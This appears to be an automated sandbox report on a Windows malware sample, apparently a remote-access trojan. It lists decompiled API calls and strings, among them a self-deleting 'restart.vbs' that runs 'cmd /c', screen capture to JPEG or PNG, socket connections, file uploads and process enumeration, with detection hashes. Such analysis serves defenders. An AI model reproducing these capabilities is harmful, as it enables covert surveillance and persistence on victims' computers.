                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403707
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(File Upload: unexpected disconnection,?), ref: 0040371F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?), ref: 0040372F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@D@2@@0@V?$basic_string@$Hstd@@$V01@V10@@$??4?$basic_string@?c_str@?$basic_string@V01@@V10@$??9std@@?append@?$basic_string@?empty@?$basic_string@?length@?$basic_string@?size@?$basic_string@LocalTimeV10@0@V12@Y?$basic_string@printfrecv
                                        • String ID: File Upload: unexpected disconnection$FileSize: $[DEBUG]$[INFO]$nTotBytesRecv:
                                        • API String ID: 2510920776-3166941866
                                        • Opcode ID: 0fd7534d0b1fd9e58be76c0a3dd4330a8e1245cd190f172d0bc5a71bc7ecd19e
                                        • Instruction ID: 46474c331338e0ade551c9c3ffb0e9ad5c3b9d5b5a2bd20438cea0ecd9357ef1
                                        • Opcode Fuzzy Hash: 0fd7534d0b1fd9e58be76c0a3dd4330a8e1245cd190f172d0bc5a71bc7ecd19e
                                        • Instruction Fuzzy Hash: 6D810B7290050DEBCB05EF90DC999EEBB7CEF54356F00406AF516A31A0DB749A85CFA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004089A6, Relevance: 63.1, APIs: 29, Strings: 7, Instructions: 134COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                          • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004089BD
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004089C6
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 004089E4
                                          • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                          • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                          • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408A07
                                        • _wgetenv.MSVCRT ref: 00408A1B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408A26
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A31
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408A3C
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408A49
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 00408A60
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,?,00000000), ref: 00408A7A
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A85
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00408A92
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A9F
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408AAB
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AB4
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ABD
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AC6
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ACF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AD8
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)), ref: 00408AE6
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408AF0
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408AFA
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408B06
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408B24
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408B31
                                        • exit.MSVCRT ref: 00408B3D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B46
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B4F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@G@1@@G@2@@0@Hstd@@V?$basic_string@$D@2@@std@@D@std@@V10@$V01@Y?$basic_string@$?length@?$basic_string@?size@?$basic_string@CloseExecuteFileModuleNameObjectOpenProcessQueryShellSingleTerminateV01@@V10@0@ValueWait_wgetenvexit
                                        • String ID: """, 0$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$\restart.vbs$exepath$open
                                        • API String ID: 864010295-1332127163
                                        • Opcode ID: fdb235b3156a944fcdf0f357b1bacb348dd9f07b2e45685e2f1c661ce8b7afb5
                                        • Instruction ID: 8251d2866ff4eed12a0f1102d9a403ddb7336c21f91015765539e7c592c0bf1e
                                        • Opcode Fuzzy Hash: fdb235b3156a944fcdf0f357b1bacb348dd9f07b2e45685e2f1c661ce8b7afb5
                                        • Instruction Fuzzy Hash: 25413D7280050DEBCB00EBA0ED49DEE777CEF98345B54407AF516E3091EB795A09CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040F5F4, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 265COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                          • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                          • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F676
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040F680
                                        • SHCreateMemStream.SHLWAPI(00000000), ref: 0040F687
                                        • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,00000000), ref: 0040F6D4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040F70C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040F72F
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0000000A), ref: 0040F755
                                        • _itoa.MSVCRT ref: 0040F75C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                          • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
                                          • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                          • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                          • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                          • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                          • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                          • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                          • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,Function_0001B310,?,Function_0001B310,0041C0C8,Function_0001B310,00000000,00000000,?,?,?,0041BF08), ref: 0040F7EF
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,0041BF08), ref: 0040F7FF
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,0041BF08), ref: 0040F80F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F81F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F82C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040F83C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F84C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000010), ref: 0040F86D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F879
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F882
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F88E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F89A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8A6
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8B2
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8BE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F856
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004D,?,?,?,?,?,?), ref: 0040F900
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F909
                                          • Part of subcall function 0040F984: GdipDisposeImage.GDIPLUS(?,00410AE2), ref: 0040F98D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@V10@0@$Create$D@1@@$?size@?$basic_string@G@2@@std@@G@std@@V01@@$?begin@?$basic_string@?c_str@?$basic_string@Stream_itoa$?end@?$basic_string@?length@?$basic_string@CompatibleDisposeGdipImageThreadV10@@connectsocket
                                        • String ID: image/jpeg
                                        • API String ID: 1042780377-3785015651
                                        • Opcode ID: b0730c79e71e437cfddf2c56560b672f6144d9d155c94930c0d9f44daa166224
                                        • Instruction ID: 2cf9f006c0d4929ef9c332e6db0d7f76cf60b2cff1cc21eb26a78d91115eee6c
                                        • Opcode Fuzzy Hash: b0730c79e71e437cfddf2c56560b672f6144d9d155c94930c0d9f44daa166224
                                        • Instruction Fuzzy Hash: 74915172900109ABDB10EFA1DC49EEF7B7CEF54304F00847AF916A7191EB745A49CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041093F, Relevance: 50.9, APIs: 26, Strings: 3, Instructions: 131fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,png,0041BCB0), ref: 00410958
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410963
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041096E
                                          • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                          • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                          • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410989
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410993
                                        • SHCreateMemStream.SHLWAPI(00000000), ref: 0041099A
                                          • Part of subcall function 0040F925: GdipLoadImageFromStreamICM.GDIPLUS(00000000,?,00000000), ref: 0040F942
                                          • Part of subcall function 0040FE07: malloc.MSVCRT ref: 0040FE2E
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 004109C2
                                          • Part of subcall function 00410AF7: GdipSaveImageToFile.GDIPLUS(?,004109D1,?,00000000,00000000,?,004109D1,00000000), ref: 00410B09
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 004109DF
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004109F5
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00410A02
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410A1B
                                        • DeleteFileW.KERNEL32(00000000), ref: 00410A22
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410A2F
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A38
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410A8A
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410A98
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410AA1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410AB1
                                          • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                          • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                          • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AC2
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410ACB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AD4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AE5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AEE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@$Create$?size@?$basic_string@D@1@@File$?data@?$basic_string@G@1@@G@2@@0@GdipHstd@@ImageStreamV01@@V10@V?$basic_string@$?length@?$basic_string@CompatibleDeleteFromLoadSavemalloc
                                        • String ID: dat$image/png$png
                                        • API String ID: 3276867942-186023265
                                        • Opcode ID: 0153ef338d7b091d17ed8657afde338b7b27d3074362cda7529c0dca2bf5b2ff
                                        • Instruction ID: 6c1464b703b8d6621652859688a13e3a01469ca8af73c80fd23fe2d238e37a16
                                        • Opcode Fuzzy Hash: 0153ef338d7b091d17ed8657afde338b7b27d3074362cda7529c0dca2bf5b2ff
                                        • Instruction Fuzzy Hash: 4F41E87280050DEBCB05EBE0ED5A9EE7B78EF54345B50807AF506A70A1EF745B48CB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409EAA, Relevance: 48.2, APIs: 32, Instructions: 162processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                          • Part of subcall function 00412AEB: GetCurrentProcess.KERNEL32(00408F3A,?,?,00408F3A,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00412AFC
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00409ECF
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                          • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                          • Part of subcall function 00412B4A: OpenProcess.KERNEL32(00000410,00000000,00409B39,6F60CB60), ref: 00412B5E
                                          • Part of subcall function 00412B4A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00409FE3
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00409FF0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040A000
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A00C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A018
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A021
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A02D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A036
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A042
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A04B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A057
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A060
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A069
